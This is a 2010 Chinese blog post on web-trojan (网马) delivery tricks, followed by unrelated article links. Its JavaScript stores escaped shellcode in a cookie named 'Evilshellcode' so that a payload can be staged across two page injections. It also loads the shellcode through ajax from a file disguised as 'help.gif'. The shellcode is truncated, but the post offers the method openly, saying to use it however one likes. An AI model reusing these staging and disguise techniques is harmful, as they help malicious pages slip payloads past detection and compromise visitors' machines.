一个网马的tips实现分析


Posted in Javascript onNovember 28, 2010

cookie示例代码:

//存放 
function setCookie(sVar, sVal){ 
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; 
document.cookie = theCookie;} 
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" 
setCookie('Evilshellcode', shellcode); 
//取出 
function getCookie(sVar){ 
cookies = document.cookie.split('; '); 
for(var i = 1; i <= cookies.length; i++){ 
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} 
return ''; 
} 
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> 
var shellcode = $.ajax({ 
url: "help.gif", 
async: false 
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

Javascript 相关文章推荐
JMenuTab简单使用说明
Mar 13 Javascript
JavaScript入门教程(5) js Screen屏幕对象
Jan 31 Javascript
window.onload追加函数使用示例
Mar 03 Javascript
js 调用百度地图api并在地图上进行打点添加标注
May 13 Javascript
JS实现的车标图片提示效果代码
Oct 10 Javascript
jquery validate表单验证的基本用法入门
Jan 18 Javascript
EasyUI的doCellTip实现鼠标放到单元格上提示单元格内容
Aug 24 Javascript
Vue.js实现表格渲染的方法
Sep 07 Javascript
引入外部js脚本加载慢与页面白屏问题的解决
Dec 10 Javascript
谈谈为什么你的 JavaScript 代码如此冗长
Jan 30 Javascript
layui输入框中只允许输入整数的实现方法
Sep 18 Javascript
js事件机制----捕获与冒泡机制实例分析
May 22 Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
jquery下将选择的checkbox的id组成字符串的方法
Nov 28 #Javascript
用jquery设置按钮的disabled属性的实现代码
Nov 28 #Javascript
IE6弹出“已终止操作”的解决办法
Nov 27 #Javascript
javascript 获取所有id中包含某关键字的控件的实现代码
Nov 25 #Javascript
You might like
PHP使用mysql_fetch_row查询获得数据行列表的方法
2015/03/18 PHP
使用php实现网站验证码功能【推荐】
2017/02/09 PHP
PHP实现十进制、二进制、八进制和十六进制转换相关函数用法分析
2017/04/25 PHP
PHP编程中的Session阻塞问题与解决方法分析
2017/08/07 PHP
PHP实现压缩图片尺寸并转为jpg格式的方法示例
2018/05/10 PHP
laravel框架实现后台登录、退出功能示例
2019/10/31 PHP
Yii实现微信公众号场景二维码的方法实例
2020/08/30 PHP
关于IFRAME 自适应高度的研究
2006/07/20 Javascript
jquery 简单导航实现代码
2009/09/11 Javascript
js内存泄露的几种情况详细探讨
2013/05/31 Javascript
Javascript 遮罩层和加载效果代码
2013/08/01 Javascript
CSS鼠标响应事件经过、移动、点击示例介绍
2013/09/04 Javascript
jQuery实现在最后一个元素之前插入新元素的方法
2015/07/18 Javascript
超全面的vue.js使用总结
2017/02/12 Javascript
详解Vue.js基于$.ajax获取数据并与组件的data绑定
2017/05/26 Javascript
详解React Native开源时间日期选择器组件(react-native-datetime)
2017/09/13 Javascript
three.js中文文档学习之如何本地运行详解
2017/11/20 Javascript
Node.js创建Web、TCP服务器
2017/12/05 Javascript
解决webpack+Vue引入iView找不到字体文件的问题
2018/09/28 Javascript
微信小程序实现点击卡片 翻转效果
2019/09/04 Javascript
javascript中可能用得到的全部的排序算法
2020/03/05 Javascript
python使用自定义user-agent抓取网页的方法
2015/04/15 Python
python flask中动态URL规则详解
2019/11/22 Python
Numpy中np.max的用法及np.maximum区别
2020/11/27 Python
Python Selenium XPath根据文本内容查找元素的方法
2020/12/07 Python
python自动化办公操作PPT的实现
2021/02/05 Python
详解html5 canvas 微信海报分享(个人爬坑)
2018/01/12 HTML / CSS
VICHY薇姿美国官方网站:欧洲药房第一的抗衰老品牌
2017/11/22 全球购物
世界上最大的铁人三项商店:Tri UK
2020/11/04 全球购物
怎样创建、运行java程序
2014/08/01 面试题
介绍一下.net和Java的特点和区别
2012/09/26 面试题
中学生差生评语
2014/01/30 职场文书
百日安全生产活动总结
2014/07/05 职场文书
小学国旗下的演讲稿
2014/08/28 职场文书
开学典礼观后感
2015/06/15 职场文书
python基础之停用词过滤详解
2021/04/21 Python